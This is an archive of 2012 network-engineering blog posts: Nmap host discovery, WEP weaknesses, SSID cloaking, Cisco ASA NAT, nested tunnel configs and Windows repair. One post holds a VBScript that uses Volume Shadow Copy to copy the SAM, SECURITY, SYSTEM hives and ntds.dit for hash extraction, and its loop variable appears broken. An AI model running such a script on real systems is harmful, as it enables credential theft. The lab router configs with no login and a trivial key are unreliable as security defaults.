2012-08-12

Nmap For The Network Engineer: Part 2

Host Discovery with Nmap

Nmap has a number of great options for host discovery. The big thing to remember Nmap will always attempt to discovery live hosts before port scanning and will only port scan hosts it detects. If all you want to do is a simple network sweep you have to use the -sn argument to disable port scanning even if you specify other discovery methods. Without -sn Nmap will do discovery of target using any specified method but will then do a port scan on top of that. Conversely if you use the -Pn argument Nmap will try to scan hosts even if they don't respond to any of the host discovery methods. Beyond that Nmap will always use ARP as its default method for discovering hosts on the same subnet. The default behavior for hosts on remote subnets is to probe with ICMP echo request + ICMP timestamp request + TCP SYN to 80 and TCP SYN to 443 to increase the odds of successful discovery. One last thing, if Nmap was called without root / system privileges it will only be able to try and initiate a TCP three-way handshake for remote hosts.

Here is a miniature cheat sheet I drew up specifically for host discovery. I will eventually draw up something similar for all the major scanning options and combine them into a single cheat sheet but for now enjoy this one.



Below I included some sample outputs, the associated tcpdump, and a short description of each argument.



The -sn argument will tell Nmap to disable port scanning. This allows you to only do a simple host discovery. When -sn is used without any other options it defaults to doing a simple ICMP echo request and ICMP timestamp query and stop there.

The -PS[p] arguement allows you to see if a host is a live using a TCP SYN packet. If you put a number in for [p] it will send a SYN to that port, otherwise Nmap defaults to port 80.

Using -PA[p] will send TCP ACK for host discovery. Again adding a number for [p] will tell Nmap to send an ACK to that specific port. If omitted it will default to 80.

Using -PE will only result in a standard ICMP echo request.

The -PP argument will invoke ICMP timestamp requests.

With -PM it will try to use ICMP address mask requests


When using -PR Nmap will only use ARP requests.


The -PO[id] command gives some interesting options. With this you can test for responses with a number of different IP protocols. Wikipedia has a pretty good list of the different IP protocols (http://en.wikipedia.org/wiki/List_of_IP_protocol_numbers)

2012-08-04

Annoying P2V problem

Just fixed an annoying problem with a P2V of a Windows 7 laptop. The VMware converter would throw the error "FAILED: Unable to find the system volume, reconfiguration is not possible" on the reconfiguration phase and bomb out at 98% completion. If you tried to boot the VM anyway you would get a BOSD with error 7B.

After a bit of Google-Fu I found the following steps were successful in repairing the the VM to a point where the converter could properly run the reconfiguration on the VM.


1. Boot the VM to a Windows 7 ISO and select the repair option
2. Open a command prompt and run the following commands
     c:\>  bootrec.exe /fixmbr
     c:\>  bootsect.exe /nt60 all /force
     c:\>  attrib -h -s C:\boot\BCD
     c:\>  del C:\boot\BCD
     c:\>  bootrec.exe /rebuildbcd
3. Shutdown the VM
4. Open the VM in the converter and reconfigure the machine
5. The VM should now boot properly

2012-07-29

Nmap For The Network Engineer: Part 1

Over the years Nmap has evolved from just a simple port scanner. It has become a swiss army knife of network scanning and has a number of tools built in including traceroute, port scanning, ping sweeps, OS fingerprinting, and versions scanning. Even beyond that there is the Nmap scripting engine which has incredible flexibility but is beyond the scope of what I am covering, maybe something for a future post.

Lets start with traceroute. Nmap's implementation of traceroute is very different from any other kind of trace route out there. When you start a traceroute to a remote host Nmap will guess the number of hops to the remote host and adjust that up or down based on the responses until it gets the exact number. Once that number is known Nmap will then decrement the TTL until it it reaches 0 or it hits a hop/router it has already discovered. In short Nmap works backwards. This is pretty inefficient for single hosts, however, in larger complex environments with multiple subnets and multiple network branches it becomes substantially more efficient then traditional traceroute since Nmap never repeats a trace over known hops.


Here is a little diagram outlining what it looks like visually.


I'll cover the other major functions and release a cheat sheet for common and most used switches when I get the time to write one up.

2012-07-24

Wireless SSID Cloaking

Is wireless SSID cloaking good for security? Short answer, no. Cloaking doesn't provide any real measure of security and in some circumstances could actually negatively impact security.

Long answer. Cloaking the SSID only prevents an access point from including the name of the SSIDs in the beacon and probe response frames but does nothing for any active wireless clients transmitting data. The 802.11 standard requires the SSID name be a part of all data carrying frames, there is no way around this. If someone has a active sniffer running that can read the full 802.11 frame then they will see the SSID regardless if the AP is set to run SSID cloaking. Also, using encryption (WPA/WPA2/WEP) does not hide the SSID in the 802.11 frame since the SSID is part of the frame header and the encryption only hides the frame payload.

This gets even dicier because in some circumstances SSID cloaking can actually be a security risk. When configured to join a non-broadcasting network Windows will  cycle through the PNL first looking for any broadcasting networks and if non are found Windows will then send out probes containing the SSID of the cloaked network. If an attacker is sniffing wireless they can see the SSID in the probes and then use a tool like Karma / Karmetasploit to go phishing for computers setup to auto-connect.

2012-07-17

A little bit about warning banners

I had a good talk today over warning banners and what should go into them so I thought I would share a bit about what was discussed.

Why have a warning banner? The big reason for having a warning banner is to limit the presumption of privacy. After all, you could argue that you never knew gaining access to an unintended system was wrong because nothing told you it was off limits. Even worse you could go after IT and security staff for monitoring or recording your actions without your consent. However, with proper use of a warning banner you can protect yourself by expressly stating that such actions are in violation and that proper steps have been taken to monitor and report criminal activity.

Now that we know why warning banners are needed the question is just what should go into one? First, and most importantly, you absolutely need to state that any use of the resource being accessed may be monitored and recorded. This is the holy grail of warning banner content and trumps any other single item you can stuff into one. Next you should be careful to state that any access is limited strictly to authorized personal and activity and that any unauthorized attempt to access, use, or modify the resource is strictly prohibited. There should also be a clause stating that any unauthorized use could result in either criminal or civil charges and if the monitoring reveals evidence of criminal activity then the company may provide that information to law enforcement.

Now I am not a lawyer nor do I pretend to be one. If you make a warning banner have some legal counsel approve it (in writing) to make sure the verbiage is solid and accurate. This is extra important if you are setting this up in countries outside your own because some may have very explicit laws regarding privacy and what you are and aren't allowed to do.

2012-07-15

Easy high level security tips and questions

Over the last few years I have had to deal with a lot of smaller business and the general lack of security has been horrifying. Every single small business I have been to has, without any exceptions, failed at some of the most basic things. In light of this I have started to cobble together an easy to read high level security review/questionnaire that even non-technical people can understand with the hopes of mitigating some of the easy things and putting them on the right path.




High-Level Security Checklist

Overview – Approach environments asking these questions
·      Confidentiality
o   Who has access to what information or resources?
·      Integrity
o   Has any information been changed and who changed it?
·      Availability
o   Is your information or resources readily accessible when needed?
Backups
·      How often are backups run?
·      Do you have offsite storage for backups?
o   Keeping tapes in a car is not secure
o   Keeping them in a home is not really secure
o   Store them in place that can be locked up and out of harms way!
·      Do you run test restores?
·      In the event recovery is needed how quickly can the off-site backups be obtained?
·      If stored with an individual can they easily be reached anytime?
·      What type of backup medium is being used?
o   Tape
§  How often are tapes replaced?
§  Cost of proper upkeep can add up
o   Cloud
§  What is the providers privacy policy?
§  What is the providers liability for lost data?
Patches and Software Updates
·      Are windows updates configured?
·      Are looking for Java updates
o   Can java be updated?
§  Some web applications can be an issue
o   Is it using automatic updates?
§  Again careful if you have sensitive web applications.
·      Are looking for Adobe updates?
o   Adobe products are among the most notorious for having frequently patched security holes
·      Are you updating you web browsers?
·      Other third-party applications
o   Third-party application updates are often the hardest type of patching to stay current on
Least Privileges
·      Do people run as admin on local computers?
o   Not making users local administrators and or leaving UAC turned on can limit and mitigate the effect of malware
·      File sharing permissions
o   Are there unused file shares on servers and desktops?
·      Do your administrators actively use domain administrator accounts or user accounts?
o   Using a domain admin account for general purpose can be a huge risk and makes it easy to comprise an environment
Passwords
·      Use different passwords for different purposes
o   People tend to use the same password for everything
·      Are passwords written down or stored in a secured format?
o   Not uncommon to find password written on sticky notes in plain sight on or around a users desk
o   If stored is it in a place other people can easily access?
§  Physically written down in a desk drawer?
§  In a text file on the computer?
o   Many applications store passwords insecurely
§  Web browsers with saved passwords are notorious
·      Do users share passwords or use shared accounts?
o   This should be kept to a absolute minimum
o   When looking at auditing trails how can you tell which user made a change?
·      Complexity requirements
o   How long do passwords last before needing to be changed?
§  Too long between changes is bad
§  If changing a password occurs too often users tend to write them down and often store them insecurely
o   How long are you passwords?
§  Absolute minimum should be 8
§  Recommended to uses long password phrases
§  More important then traditional complexity
o   Do you require specific character sets?
§  Less important then length
§  Most password crackers substitute common letter to symbol replacements (1 to !, a to @, s to $) as it tries different dictionary words
o   Are you passwords based on dictionary words?
§  Can easily be tested with password auditing
§  Dictionary words with numbers after then and or character substitution are not effective
Anti-Virus/Malware
·      Important but its not a silver bullet
·      Not about total prevention its but rather reducing your attack surface to manageable levels
·      Are you up to date on your subscriptions and definitions?
Firewalls
·      Do you have appropriate rules for traffic / email / content filtering
o   Are you blocking inbound traffic?
o   Are you blocking outbound traffic?
·      Are you blocking inbound traffic from regions you don’t do business in (you don’t do business outside the US so block traffic from china)
·      Are you using a VPN solution for remote access?
Wireless
·      Are you using WPA/WPA2 with AES
o   WEP is NOT secure and very easily hacked
o   TKIP encryption has known flaws and not recommended
·      MAC address filtering doesn’t help
·      SSID cloaking can give a false sense of security and even be risk in itself and is not recommended
Encryption
·      Do you have data that requires using disk encryption?
o   PGP / Truecrypt
·      Do you need email encryption
o   PGP / GNUGP
Data Removal
·      How do you decommission old computers?
·      Do you erase data before getting rid of a computer?
o   Just deleting from Windows is not enough and leaves the original files intact in a way that it can be easily extracted
o   Secure erase with third-party tools is recommended
Disaster Recovery
·      Do you have a disaster recovery plan?
o   Does it cover data loss?
o   Does it cover equipment loss?
§  Is there spare equipment available if needed?

Web GUI for IOU

Been a while since my last post. Lots of changes going on, new job, new place, and more so time has really been constrained. On a side note can't wait till Defcon 20. See you in Las Vegas!

I recently run across an interesting page about a web GUI for running IOU. I haven't had a chance to check it out yet but it seemed pretty cool.

https://the1979s.wordpress.com/cisco/cisco-iou-web-interface/


2012-04-08

ASA 5505 Under the Hood

In part of preparing to run a training on Cisco ASA's for some help desk techs I drew up a diagram to logically show how the ASA 5505 works under the hood in regards to its 8 port switch and virtual interfaces for passing traffic.

Inside the ASA 5505 there is a 8port 10/100 switch that functions just like you would expect any old layer 2 switch to work. Its only through the use of virtual "VLAN interfaces" that the ASA 5505 is able to route, control, and NAT traffic. At its most basic a VLAN interface is virtual interface that exists inside the ASA software and is bound to a layer2 VLAN. It also acts like a routed interface on a ASA 5510 and higher, a normal router or a VLAN interface on a layer 3 switch.




2012-03-12

VPNCEPTION

A while back I was asked if it was possible to run a series of tunnels between three routers. The requirements were that routers A and B had a GRE over IPSec tunnel and routers A and C had a GRE tunnel that went inside the tunnel between A and B.

After a beer or two and spending some time on the white board I came up with a solution that used series VTIs and routing to control traffic flow. Everything looked plausible so it was time to lab out a proof of concept. After fiddling with the routing a little bit I was able to ping loopback interfaces between routers A and C and was able to verify complete traversal by checking the tunnel statistics and ipsec packet encaps and decaps. Success!

Had a lot of fun doing this one, never had to work with nested tunnels before so it was a great  experience.



Here is how it looked on the white board.



And now for the router configs.



-------------R1------------
Router(config)#do show run
Building configuration...

Current configuration : 1779 bytes
!
version 12.4
service timestamps debug datetime msec
service timestamps log datetime msec
no service password-encryption
!
hostname Router
!
boot-start-marker
boot-end-marker
!
!
no aaa new-model
memory-size iomem 5
ip cef
!
!
!
!
no ip domain lookup
ip auth-proxy max-nodata-conns 3
ip admission max-nodata-conns 3
!
!
!
!
!
!
!
!
!
!
!
!
!
!
!
!
!
!
!
!
!
crypto isakmp policy 10
 encr aes
 authentication pre-share
 group 5
crypto isakmp key cisco address 10.10.50.2
!
!
crypto ipsec transform-set vpntransform esp-aes esp-sha-hmac
 mode transport
!
crypto ipsec profile vti-profile
 set transform-set vpntransform
!
!
!
!
!
interface Loopback0
 ip address 192.168.4.1 255.255.255.0
!
interface Tunnel0
 ip address 172.16.50.1 255.255.255.252
 tunnel source FastEthernet0/0
 tunnel destination 10.10.50.2
 tunnel mode ipsec ipv4
 tunnel protection ipsec profile vti-profile
!
interface Tunnel1
 ip address 172.16.51.1 255.255.255.252
 tunnel source Tunnel0
 tunnel destination 172.16.50.2
!
interface Tunnel2
 ip address 172.16.52.1 255.255.255.252
 tunnel source Tunnel1
 tunnel destination 10.10.60.2
!
interface FastEthernet0/0
 ip address 10.10.50.1 255.255.255.252
 duplex auto
 speed auto
!
interface FastEthernet0/1
 no ip address
 shutdown
 duplex auto
 speed auto
!        
ip forward-protocol nd
ip route 10.10.60.0 255.255.255.252 Tunnel1
ip route 192.168.6.0 255.255.255.0 Tunnel2
!
!
no ip http server
no ip http secure-server
!
!
!
!
control-plane
!
!
!
!
!
!
!
!
!
!        
line con 0
 exec-timeout 0 0
 privilege level 15
 logging synchronous
line aux 0
line vty 0 4
 exec-timeout 0 0
 privilege level 15
 logging synchronous
 no login
line vty 5 15
 exec-timeout 0 0
 privilege level 15
 logging synchronous
 no login
!
!
end






-------------R2------------
Router(config)#do show run
Building configuration...

Current configuration : 1549 bytes
!
version 12.4
service timestamps debug datetime msec
service timestamps log datetime msec
no service password-encryption
!
hostname Router
!
boot-start-marker
boot-end-marker
!
!
no aaa new-model
memory-size iomem 5
ip cef
!
!
!
!
no ip domain lookup
ip auth-proxy max-nodata-conns 3
ip admission max-nodata-conns 3
!
!
!
!
!
!
!
!
!
!
!
!
!
!
!
!
!
!
!
!
!
crypto isakmp policy 10
 encr aes
 authentication pre-share
 group 5
crypto isakmp key cisco address 10.10.50.1
!
!
crypto ipsec transform-set vpntransform esp-aes esp-sha-hmac
 mode transport
!
crypto ipsec profile vti-profile
 set transform-set vpntransform
!
!
!
!
!
interface Loopback0
 ip address 192.168.5.1 255.255.255.0
!
interface Tunnel0
 ip address 172.16.50.2 255.255.255.252
 tunnel source FastEthernet0/0
 tunnel destination 10.10.50.1
 tunnel mode ipsec ipv4
 tunnel protection ipsec profile vti-profile
!
interface Tunnel1
 ip address 172.16.51.2 255.255.255.252
 tunnel source Tunnel0
 tunnel destination 172.16.50.1
!
interface FastEthernet0/0
 ip address 10.10.50.2 255.255.255.252
 duplex auto
 speed auto
!
interface FastEthernet0/1
 ip address 10.10.60.1 255.255.255.252
 duplex auto
 speed auto
!
ip forward-protocol nd
!
!
no ip http server
no ip http secure-server
!        
!
!
!
control-plane
!
!
!
!
!
!
!
!
!
!
line con 0
 exec-timeout 0 0
 privilege level 15
 logging synchronous
line aux 0
line vty 0 4
 exec-timeout 0 0
 privilege level 15
 logging synchronous
 no login
line vty 5 15
 exec-timeout 0 0
 privilege level 15
 logging synchronous
 no login
!
!
end





-------------R3------------
Router(config-if)#do show run
Building configuration...

Current configuration : 1177 bytes
!
version 12.4
service timestamps debug datetime msec
service timestamps log datetime msec
no service password-encryption
!
hostname Router
!
boot-start-marker
boot-end-marker
!
!
no aaa new-model
memory-size iomem 5
ip cef
!
!
!
!
no ip domain lookup
ip auth-proxy max-nodata-conns 3
ip admission max-nodata-conns 3
!
!
!
!
!
!
!
!
!
!
!
!
!
!
!
!
!
!
!
!
!
!
!        
!
interface Loopback0
 ip address 192.168.6.1 255.255.255.0
!
interface Tunnel2
 ip address 172.16.52.2 255.255.255.252
 tunnel source FastEthernet0/1
 tunnel destination 172.16.51.1
!
interface FastEthernet0/0
 no ip address
 shutdown
 duplex auto
 speed auto
!
interface FastEthernet0/1
 ip address 10.10.60.2 255.255.255.252
 duplex auto
 speed auto
!
ip forward-protocol nd
ip route 172.16.51.0 255.255.255.252 10.10.60.1
ip route 192.168.4.0 255.255.255.0 Tunnel2
!
!
no ip http server
no ip http secure-server
!
!
!
!
control-plane
!
!
!
!
!
!
!
!
!
!
line con 0
 exec-timeout 0 0
 privilege level 15
 logging synchronous
line aux 0
line vty 0 4
 exec-timeout 0 0
 privilege level 15
 logging synchronous
 no login
line vty 5 15
 exec-timeout 0 0
 privilege level 15
 logging synchronous
 no login
!
!
end

2012-03-06

Why WEP Sucks

Before I go into the details on why WEP sucks its important to understand how it works. WEP was designed around the RC4 stream cypher and supports 64-bit or 128-bit keys. The first 24 bits of a WEP key is known as the initialization vector (IV) and is supposed to be a random and unique value for each packet. These IVs are then combined with the pre-shared key and fed into the RC4 algorithm to produce a pseudo-random stream or PRGA. WEP will then XOR the PRGA against a clear text packet and its integrity checksum to produce an encrypted packet.

Now here is where WEP starts to go down hill. Once the encrypted packet is generated the 24-bit IV that was used is then pre-pended to the encrypted packet in clear text before it’s sent to the destination. This means WEP only effectively provides 40 and 104 bits of protection.

If the IVs were never re-used it wouldn’t be nearly as big a problem. Now consider that the 24 bits used in an IV provides about 16.7 million possible combinations. This may sound like a lot but in reality the likelihood of having the same IV re-used is very high and is well illustrated by a situation known as the birthday paradox. On average it only takes about 5,000 packets to yield a 50% chance of seeing a collision; that is when two packets with the same IV are seen.

When two packets using the same pre-shared key have a colliding IV they will also share the same PRGA used to encrypt the packet. If the contents of a packet can be deduced or predicted then it becomes possible to XOR the known clear text against its encrypted form to reproduce the PRGA. Once the PRGA is known any further packets with a colliding IV can be decrypted. Although this doesn’t reveal the pre-shared key the ability to decrypt single packets is still a problem. That’s strike one.

WEP also has zero replay protection. What makes this one so bad is the normal authentication and challenge/response process used by WEP. When an AP sends a challenge to a client it is sent in clear text along with the IV. When received the client uses the provided IV and WEP key to encrypt the challenge and send it back to the AP. If the challenge/response is captured then we have a known packet and its encrypted counterpart. All you need to do is XOR the challenge with the response and you will reproduce the PRGA for packets with the same IV. This is especially bad because you can then  inject traffic into a network that will elicit predictable responses leading to more known IV and PRGA pairs. That’s strike two.

Now to bring it all home, this is the coup da grace on why WEP sucks. Nearly every single packet sent has a standard Ethernet header. The header always starts with 0xAA 0xAA and is at predictable location inside an encrypted packet. Knowing this you can use the encrypted packets and their known IVs to brute force keys that return 0xAA 0xAA at their expected locations. There is also a similar method that focuses on known parts of standard ARP request. When combined the ability to phish for encrypted packets and IVs with replaying and injection it becomes possible to break WEP outright in as little as 1 minute. That’s strike three.

If breaking the encryption wasn’t bad enough we also need to consider the fact that WEP uses a very poor check for data integrity. The integrity algorithm used by WEP is only CRC32; which was never designed for cryptographic security and can easily be spoofed. What’s even worse is WEP and CRC32 don’t roll in any security elements into its calculation so there is nothing to verify the data came from a legitimate source.

TLDR: If you care about security avoid WEP because it sucks and offers no real protection against intelligent and or targeted attacks.

2012-03-01

ASA NAT Part 4 - Using Object NAT


In the diagram below we have three servers and a local network with some users that all need to get out to the Internet. The Web server and FTP server have to share the same public IP.



Step1: Make objects for both the outside and inside addresses that will be used.

ASA(config)# network network public-webftp
ASA(config-network-object)#  host 1.1.1.1
ASA(config)# network network public-appserv
ASA(config-network-object)#  host 1.1.1.2
ASA(config)# network network public-hidenat
ASA(config-network-object)#  host 1.1.1.3
ASA(config)# network network InsideLan
ASA(config-network-object)#  subnet 10.10.10.0 255.255.255.0
ASA(config)# network network server-web-http
ASA(config-network-object)#  host 10.10.10.5
ASA(config)# network network server-web-https
ASA(config-network-object)#  host 10.10.10.5
ASA(config)# network network server-ftp
ASA(config-network-object)#  host 10.10.10.6
ASA(config)# network network server-apps
ASA(config-network-object)#  host 10.10.10.7

Step2: Apply NAT to our inside objects.

ASA(config)# network network InsideLan
ASA(config-network-object)# nat (inside,outside) dynamic public-hidenat
ASA(config)# network network server-web-http
ASA(config-network-object)# nat (inside,outside) static public-webftp service tcp 80 80
ASA(config)# network network server-web-https
ASA(config-network-object)# nat (inside,outside) static public-webftp service tcp 443 443
ASA(config)# network network server-ftp
ASA(config-network-object)# nat (inside,outside) static public-webftp 21 21
ASA(config)# network network server-apps
ASA(config-network-object)# nat (inside,outside) static public-appserv


Step3: Make or modify the interface access-list to allow incoming traffic to the servers

ASA(config)# access-list outside-incoming extended permit tcp any object
server-web-http eq 80
ASA(config)# access-list outside-incoming extended permit tcp any object
server-web-https eq 443
ASA(config)# access-list outside-incoming extended permit tcp any object
server-ftp eq 21
ASA(config)# access-list outside-incoming extended permit tcp any object
server-apps eq 1234
ASA(config)# access-group outside-incoming in interface outside




If you prefer to use the ASDM here is a basic run down of how to add an Object NAT.

Step1: You can either add/edit an existing object using the toolbar on the right side or in the NAT configuration window you can add an Object NAT from the drop down Add menu.





Step2: Once the object window is shown click the little drop down arrow to access the NAT configuration section.



Step3. Check the Add Automatic Address Translation rules box.



Step4: Select if you wish to do a static, dynamic, or dynamic PAT and add your translated address or object. Once done filling out the type and translated address click the advanced button.



Step5: In this window you select your source and translated (destination) interfaces. If you want to do a Static 1 to 1 NAT you can leave the service section blank without port numbers. If you want to perform a PAT or port forward fill them out. The last thing on this window is the “Translate DNS replies for rule” option. This function only available if you want to do a Static 1 to 1 NAT (no port numbers filled out).



2012-02-29

Dumping system hives and ntds.dit on live machines

This is nothing new if you follow security. A while back Tim Tomes and Mark Baggett discovered you could safely get at system hashes by dumping the system hives and the ntds.dit with the Volume Shadowcopy Service. Tim even wrote a vbscript that allowed you to interact with windows VSS in a very detailed manner and even on workstations that didn't include full vssadmin functionality. (http://pauldotcom.com/2011/11/safely-dumping-hashes-from-liv.html)

Well being a rather lazy geek I took his script and tooled it around a bit so it did everything for me. The result was a vbscript that runs on Windows Vista, 7, and 2008 that will dump the system hives and ntds.dit if found.

I am not a true code monkey so please forgive the sloppy code :)



'''Setting Variables'''
strComputer = "."
set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")

'''Start VSS'''
set objListOfServices = objWMIService.ExecQuery("Select * from Win32_Service Where Name ='VSS'")
for each objService in objListOfServices
    objService.StartService()
next

'''Create a new shadow copy'''
set objShadowStorage = objWMIService.Get("Win32_ShadowCopy")
varCreateResult = objShadowStorage.Create("C:\", "ClientAccessible", strShadowID)

'''Find the directory path for the shadow copy'''
set colListItems = objWMIService.ExecQuery("Select * from Win32_ShadowCopy")
for each objListItem in colListItems
    if objListItem.ID = strShadowID then
        strShadowPath = objListItem.DeviceObject
    end if
next

'''Copy the NTDS.DIT and SAM/SEC/SYS hives from the shadow copy volume'''
set objShell = wscript.CreateObject( "WScript.Shell" )
strComputerName = objShell.ExpandEnvironmentStrings( "%COMPUTERNAME%" )
set objFSO = CreateObject("Scripting.FileSystemObject")
strDestDir = CreateObject("Scripting.FileSystemObject").GetAbsolutePathName(".")
strShadowPath = replace(strShadowPath,"?",".",1,1)
strDumpPaths = array("\windows\system32\config\","\windows\system32\ntds\")
strDumpItems = array("SAM","SECURITY","SYSTEM","ntds.dit")
for each lstDumpPaths in strDumpPathsasreplaced
    for each lstDumpItems in strDumpItems
        strTempPath = strShadowPath & lstDumpPaths & lstDumpItems
        if objFSO.FileExists(strTempPath) then
            objFSO.CopyFile strTempPath, strDestDir & "\" & strComputerName & "-" & lstDumpItems, true
        end if
    next
next

'''Delete the temporary shadow copy'''
set objDelItems = objWMIService.ExecQuery("Select * From Win32_ShadowCopy")
for each lstDelItem in objDelItems
    if lstDelItem.ID = strShadowID then
        varDelResult = lstDelItem.Delete_
    end if
next

ASA NAT Part 3 - Twice NAT Breakdown


Twice NAT Breakdown
Twice NAT can be a bit intimidating when your first look at it since the statements are much longer and have more variables. The best way I have found to approach it is to just break it down and look at it in chunks. It’s also important to note that Twice NAT requires the use of network and service objects. You can’t use straight up numbers for source or destination addresses and port numbers. Lastly all Twice NAT statements are added at the global config level.

Command
ASA(config)# nat (original-interface,translated-interface) [line-number|{after-auto [line-number]}] source static|dynamic original-object interface|translated-object [destination static original-destination translated-destination] [service original-service-object translated-service-object] [dns] [unidirectional] [inactive] [description text]

Interfaces
(original-interface,translated-interface)

(original interface,translated interface) - The “original interface” is the interface where object you are applying the NAT too exists and the “translated interface” is the interface where you are making your resource available. The ‘any’ keyword can be used when specifying the original or translated interfaces.

Placement
[line-number|{after-auto [line-number]}]

line-number – Optional. If you wish to insert the NAT rule at a specific location you can do so by using the line-number command. If omitted the rule will be appended to the end of section 1.

after-object [line-number] – Optional. If you want to mark the NAT rule to be processed in section three, after object NAT, use the after-object flag. Additionally if you specify a line number you may insert the after-object NAT at specific location in section 3.

Source address translation
source static|dynamic original-object interface|translated-object

source – Specifies the following commands are parameters for modifying the source address of a packet during translation.

static|dynamic – This simply notes if your performing a static or dynamic NAT.

original-object – This object identifies what source address or network we want to translate

interface|translated-object – Here is where we specify what we want our source address or network to be after translation. We can use either the interface address of the translated interface or an object.

Destination address translation
[destination static original-destination translated-destination]

destination – Specifies the following commands are parameters for modifying the destination address of a packet during translation.

static – Only option here. Tells the ASA we are doing a static translation on the destination address.

original-destination – This is where we identify the original destination address of a packet. Unless a packet has the destination address specified here the rule won’t apply.

translated-destination – Here we can change the destination address of a packet to something else.

Port translations
[service original-service-object translated-service-object]

service – Specifies the following commands are parameters for modifying the source and or destination port numbers of a packet during translation.

original-service-object – This is the service object that identifies the original source and or destination ports of a packet. Unless a packet has the source and or destination ports noted in this service object the rule won’t apply.

translated-service-object – This is where we can change the source and or destination ports of a packet.

Optional flags
[dns] [unidirectional] [inactive] [description {text}]

dns – This flags the rule for DNS re-writes. Can only be used on static 1 to 1 NAT.

unidirectional – NAT by nature is a two way process, but by using this flag a translation can be forced only work in a single direction.

inactive – This flag will prevent a rule from being used even though it is present.

description {text} – This flag lets us add a short description to a rule.

Like Object NAT it’s not a perfect system and it certainly has its fair share of annoyances, like not being able to use straight out numbers for addresses or ports. The biggest gotcha I found with Twice NAT is that service objects can have both source and destination ports defined. Its entirely possible to make rules that will never match any traffic and doing a simple ‘show run nat’ won’t display the contents of the objects so it can be very easy to overlook when troubleshooting a NAT issue. Overall though I think it’s a great system. It could use a few improvements for sure but that’s true of anything.